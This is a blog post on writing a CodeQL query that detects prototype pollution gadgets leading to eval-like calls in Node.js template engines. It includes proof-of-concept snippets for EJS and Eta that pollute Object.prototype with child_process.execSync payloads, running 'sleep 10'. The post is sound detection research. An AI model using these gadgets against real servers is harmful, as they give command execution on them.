Finding Prototype Pollution gadgets with CodeQL
TL;DR
Following latest CodeQL introduction post and inspired by a challenge from SonarSource’s #codeadvent2021 and SecurityMB’s October 2021 challenge, I thought it would be fun to write a CodeQL query to find prototype pollution gadgets.
I made a quick and dirty approach (to be fair, it was my first time using CodeQL for javascript), that already found interesting results, that I’d eventually improve, so keep reading if you want to see the entire process along with some interesting results!
Prototype Pollution
The objective of this post is not to explain what prototype pollution vulnerability is, but overall, being able to edit an object’s prototype or Object
’s prototype (through their properties) lets an attacker pollute it and likely maliciously change affected code’s objective.
Gadgets
We may understand [insert vulnerability here] gadgets as code snippets or behaviours that help a vulnerability to happen. In this case, a prototype pollution gadget is an object’s property read which is not defined flowing to a JS-executing function (such as eval
or Function
).
- The gadget needs not to be defined, as object’s property reads uses object’s prototype property reads as a fallback.
CodeQL query development
You may find the final query at #final-query.
The first approach looked like the following snippet:
/**
* @kind path-problem
*/
import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph
class BadIfPollutedConfig extends TaintTracking::Configuration {
BadIfPollutedConfig() { this = "BadIfPollutedConfig" }
// Any {} that does not set a custom __proto__
override predicate isSource(DataFlow::Node source) {
exists(DataFlow::ObjectLiteralNode object |
not object.toString().matches("%\\_\\_proto\\_\\_%") and
source = object
)
}
// An expression which may be evaluated as JavaScript
override predicate isSink(DataFlow::Node sink) { sink instanceof EvalJavaScriptSink }
// Make a valid step: variable = {} -> Object.create(variable)
override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
exists(DataFlow::SourceNode c, DataFlow::CallNode call |
c.toString() = "Object.create" and
call = c.getACall() and
nodeFrom = call.getArgument(0) and
nodeTo = call
)
}
}
from BadIfPollutedConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@", source.getNode(), "Empty dict",
sink.getNode(), "this eval-alike call."
However, almost everything is likely improvable.
Source
override predicate isSource(DataFlow::Node source) {
exists(DataFlow::ObjectLiteralNode object |
not object.toString().matches("%\\_\\_proto\\_\\_%") and
source = object
)
}
Some of you may have wanted to erase me from the universe for using toString()
to check a property access, but that’s the only thing I thought about before digging into CodeQL for JavaScript’s juice.
Playing with objects' properties:
a = {}
:ObjectLiteralNode
declaration.a.foo = "bar"
:PropWrite
-
getBase()
is a use of the first point (thengetBase().getALocalSource()
is what we will be using to correlate both nodes).
-
getPropertyName()
returnsfoo
.
-
getRhs()
returns"bar"
.
eval(a.foo)
:eval
’s first argument is aPropRead
with the samegetBase()
andgetPropertyName()
predicates.
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
BadIfPollutedSource() {
not exists(DataFlow::PropWrite propWrite |
// ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
exists( |
propWrite.getPropertyName() = ["__proto__", "constructor"] and
propWrite.getBase().getALocalSource() = this
)
or
// ObjectLiteralNode.constructor.prototype
exists(DataFlow::PropRead constRead |
constRead.getPropertyName() = "constructor" and
constRead.getBase().getALocalSource() = this and
propWrite.getPropertyName() = "prototype" and
propWrite.getBase().getALocalSource() = constRead
) and
propWrite.getRhs().asExpr() instanceof NullLiteral
)
}
}
Sink
override predicate isSink(DataFlow::Node sink) {
sink instanceof EvalJavaScriptSink
}
Sink’s evolution just focus on getting proper results like tainted
in tainted + foo
when it is the last step of a flow.
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
DataFlow::ValueNode t;
DataFlow::InvokeNode c;
CustomEvalJavaScriptSink() {
t instanceof EvalJavaScriptSink and
c.getAnArgument() = t and
(
if exists(t.asExpr().(AddExpr))
then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
else this = t
)
}
DataFlow::InvokeNode getCall() { result = c }
}
Furthermore, wrapping EvalJavaScriptSink
in a variable let us get the call whose argument is that variable in order to make a getCall()
predicate used in the select clause of the query.
Additional taint step
override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
exists(DataFlow::SourceNode c, DataFlow::CallNode call |
c.toString() = "Object.create" and
call = c.getACall() and
nodeFrom = call.getArgument(0) and
nodeTo = call
)
}
This taint step lets CodeQL know that there may be flow like an ObjectLiteralNode
flowing to the first argument of Object.create
, whose result is also a valid gadget.
We will be using globalVarRef
and its getAMemberCall
predicate to properly get Object.create
call (instead of using SourceNode
’s toString
).
override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
exists(DataFlow::InvokeNode objectCreate |
objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
nodeFrom = objectCreate.getArgument(0) and
nodeTo = objectCreate
)
}
Sanitizer
override predicate isSanitizer(DataFlow::Node sanitizer) {
exists(LogOrExpr orExpr, Expr leftSource |
leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
not leftSource = orExpr.getLeftOperand() and
not leftSource instanceof NullLiteral and
not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
sanitizer.asExpr() = orExpr.getRightOperand()
)
}
We want to stop tracking flow when a LogOrExpr
(foo || bar
) holds an ObjectLiteralNode
in the right side of the expression and a valid variable in the first operand.
Debugging
Let’s make query development easier and more fun by:
- Using
Backward DataFlow
: SetisSource()
asany()
, so we will be getting every single node flowing to our specific sink. - Using
Forward DataFlow
: SetisSink()
asany()
, so we will be getting flow from our specific source to any node. - Setting custom node files in order to restrict result locations.
- Using a custom
PathNode
implementation to get the QL class used in each step of the flow path.
See #debugging-query.
Query hits
In order to test the query, I ran it against all sources listed in Template engines for NodeJS.
Some snippets to test locally:
- Outdated EJS (version provided by NPM though)
// edited from https://twitter.com/sonarsource/status/1471148042577350659
const express = require('express');
const app = express();
app.set('view engine', 'ejs');
app.set('views', __dirname + '/views');
cmd = "sleep 10";
Object.prototype.outputFunctionName = `a;process.mainModule.require('child_process').execSync('${cmd}');//`;
Object.prototype.client = "notEmpty"; Object.prototype.escapeFunction = '`${process.mainModule.require(\'child_process\').execSync(\'' + cmd + '\')}`';
Object.prototype.client = "notEmpty"; Object.prototype.escape = '`${process.mainModule.require(\'child_process\').execSync(\'' + cmd + '\')}`';
Object.prototype.localsName = `a=process.mainModule.require('child_process').execSync('${cmd}')`;
Object.prototype.destructuredLocals = ["/*", `*/a=process.mainModule.require('child_process').execSync('${cmd}');//`];
app.get('/ejs', (req, res) => {
res.render('template', {foo: "bar"})
})
app.listen(1337);
// edited from https://eta.js.org/docs/examples/express
var express = require("express")
var app = express()
var eta = require("eta")
app.engine("eta", eta.renderFile)
app.set("view engine", "eta")
app.set('views', __dirname + '/views');
cmd = "sleep 10";
Object.prototype.useWith = "notEmpty"; Object.prototype.varName = `a=process.mainModule.require('child_process').execSync('${cmd}')`;
app.get("/eta", function (req, res) {
res.render("template", {foo: "bar"})
})
app.listen(1337)
Final query
/**
* @kind path-problem
*/
import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph
/**
* A custom `EvalJavaScriptSink` wrapper.
*
* * `t` holds `EvalJavaScriptSink`.
* * `c` holds the call holding `t`.
*
* There's an additional taint step specified in order to catch
* `tainted` in sinks like `tainted + foo`; since the sink is
* the entire argument, this way the results are more accurate.
*/
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
DataFlow::ValueNode t;
DataFlow::InvokeNode c;
CustomEvalJavaScriptSink() {
t instanceof EvalJavaScriptSink and
c.getAnArgument() = t and
(
if exists(t.asExpr().(AddExpr))
then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
else this = t
)
}
DataFlow::InvokeNode getCall() { result = c }
}
/**
* An `ObjectLiteralNode` not overriding its `__proto__`, `constructor` and
* `constructor.prototype` properties.
*
* It is not set as sanitizer since flow between two same source-sink AST nodes
* may differ (i.e., one path in source-sink flow may not pass through this
* property writes)
*/
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
BadIfPollutedSource() {
not exists(DataFlow::PropWrite propWrite |
// ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
exists( |
propWrite.getPropertyName() = ["__proto__", "constructor"] and
propWrite.getBase().getALocalSource() = this
)
or
// ObjectLiteralNode.constructor.prototype
exists(DataFlow::PropRead constRead |
constRead.getPropertyName() = "constructor" and
constRead.getBase().getALocalSource() = this and
propWrite.getPropertyName() = "prototype" and
propWrite.getBase().getALocalSource() = constRead
) and
propWrite.getRhs().asExpr() instanceof NullLiteral
)
}
}
class BadIfPollutedConfig extends TaintTracking::Configuration {
BadIfPollutedConfig() { this = "BadIfPollutedConfig" }
/**
* An `ObjectLiteralNode` that does not set a custom prototype
* on its declaration or flow.
*
* See `BadIfPollutedSource`.
*/
override predicate isSource(DataFlow::Node source) { source instanceof BadIfPollutedSource }
/**
* An expression which may be evaluated as JavaScript.
*
* See `CustomEvalJavaScriptSink`.
*/
override predicate isSink(DataFlow::Node sink) { sink instanceof CustomEvalJavaScriptSink }
/**
* Make a valid taint step: `a = {} -> Object.create(a)`.
*/
override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
exists(DataFlow::InvokeNode objectCreate |
objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
nodeFrom = objectCreate.getArgument(0) and
nodeTo = objectCreate
)
}
/**
* `foo || BadIfPollutedSource` -> `foo` holds a non (not defined|null|false) value
* and so it will be assigned instead of `BadIfPollutedSource`.
*
* FP issue: `foo` may be declared out of taint tracking's scope.
*
* `leftSource = orExpr.getLeftOperand()`: when a node's local source is itself
* means the node might not be defined in the scope.
*/
override predicate isSanitizer(DataFlow::Node sanitizer) {
exists(LogOrExpr orExpr, Expr leftSource |
leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
not leftSource = orExpr.getLeftOperand() and
not leftSource instanceof NullLiteral and
not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
sanitizer.asExpr() = orExpr.getRightOperand()
)
}
}
from BadIfPollutedConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@ as $@", source.getNode(), "This object",
sink.getNode().(CustomEvalJavaScriptSink).getCall(), "this eval-alike call", sink.getNode(),
sink.toString()
Debugging query
semmle.javascript.custom.Debug
:
private import javascript
module Debug {
/**
* If `true`, show the QL class for each flow step.
*/
boolean getDebug() { result = false }
/**
* If `true`, apply Backward Dataflow.
*/
boolean getBackward() { result = false }
/**
* If `true`, apply Forward Dataflow.
*/
boolean getForward() { result = false }
/**
* Returns a `File` with a specific basename.
*/
File getFile() {
result.getBaseName().matches("%%") and not result.getBaseName().matches("test.js")
}
}
class CustomPathNode extends DataFlow::PathNode {
CustomPathNode() { this = this }
override string toString() {
if Debug::getDebug() = true
then result = this.getNode().toString() + ", " + this.getNode().getAQlClass()
else result = this.getNode().toString()
}
}
Main query:
/**
* @kind path-problem
*/
import javascript
import semmle.javascript.security.dataflow.CodeInjectionCustomizations::CodeInjection
import DataFlow::PathGraph
import semmle.javascript.custom.Debug
/**
* A custom `EvalJavaScriptSink` wrapper.
*
* * `t` holds `EvalJavaScriptSink`.
* * `c` holds the call holding `t`.
*
* There's an additional taint step specified in order to catch
* `tainted` in sinks like `tainted + foo`; since the sink is
* the entire argument, this way the results are more accurate.
*/
class CustomEvalJavaScriptSink extends DataFlow::ValueNode {
DataFlow::ValueNode t;
DataFlow::InvokeNode c;
CustomEvalJavaScriptSink() {
t instanceof EvalJavaScriptSink and
c.getAnArgument() = t and
(
if exists(t.asExpr().(AddExpr))
then this.asExpr() = t.asExpr().(AddExpr).getAnOperand()
else this = t
)
}
DataFlow::InvokeNode getCall() { result = c }
}
/**
* An `ObjectLiteralNode` not overriding its `__proto__`, `constructor` and
* `constructor.prototype` properties.
*
* It is not set as sanitizer since flow between two same source-sink AST nodes
* may differ (i.e., one path in source-sink flow may not pass through this
* property writes)
*/
class BadIfPollutedSource extends DataFlow::ObjectLiteralNode {
BadIfPollutedSource() {
not exists(DataFlow::PropWrite propWrite |
// ObjectLiteralNode.__proto__ and ObjectLiteralNode.constructor
exists( |
propWrite.getPropertyName() = ["__proto__", "constructor"] and
propWrite.getBase().getALocalSource() = this
)
or
// ObjectLiteralNode.constructor.prototype
exists(DataFlow::PropRead constRead |
constRead.getPropertyName() = "constructor" and
constRead.getBase().getALocalSource() = this and
propWrite.getPropertyName() = "prototype" and
propWrite.getBase().getALocalSource() = constRead
) and
propWrite.getRhs().asExpr() instanceof NullLiteral
)
}
}
class BadIfPollutedConfig extends TaintTracking::Configuration {
BadIfPollutedConfig() { this = "BadIfPollutedConfig" }
/**
* An `ObjectLiteralNode` that does not set a custom prototype
* on its declaration or flow.
*
* See `BadIfPollutedSource`.
*/
override predicate isSource(DataFlow::Node source) {
(if Debug::getBackward() = true then any() else source instanceof BadIfPollutedSource) and
source.getFile() = Debug::getFile()
}
/**
* An expression which may be evaluated as JavaScript.
*
* See `CustomEvalJavaScriptSink`.
*/
override predicate isSink(DataFlow::Node sink) {
(if Debug::getForward() = true then any() else sink instanceof CustomEvalJavaScriptSink) and
sink.getFile() = Debug::getFile()
}
/**
* Make a valid taint step: `a = {} -> Object.create(a)`.
*/
override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
exists(DataFlow::InvokeNode objectCreate |
objectCreate = DataFlow::globalVarRef("Object").getAMemberCall("create") and
nodeFrom = objectCreate.getArgument(0) and
nodeTo = objectCreate
)
}
/**
* `foo || BadIfPollutedSource` -> `foo` holds a non (not defined|null|false) value
* and so it will be assigned instead of `BadIfPollutedSource`.
*
* FP issue: `foo` may be declared out of taint tracking's scope.
*
* `leftSource = orExpr.getLeftOperand()`: when a node's local source is itself
* means the node might not be defined in the scope.
*/
override predicate isSanitizer(DataFlow::Node sanitizer) {
exists(LogOrExpr orExpr, Expr leftSource |
leftSource = orExpr.getLeftOperand().flow().getALocalSource().asExpr() and
not leftSource = orExpr.getLeftOperand() and
not leftSource instanceof NullLiteral and
not orExpr.getLeftOperand().mayHaveBooleanValue(false) and
sanitizer.asExpr() = orExpr.getRightOperand()
)
}
}
from BadIfPollutedConfig cfg, CustomPathNode source, CustomPathNode sink
where cfg.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@ flows to $@ as $@", source.getNode(), "This object",
sink.getNode().(CustomEvalJavaScriptSink).getCall(), "this eval-alike call", sink.getNode(),
sink.toString()
The end
I hope you found it interesting and had fun reading it!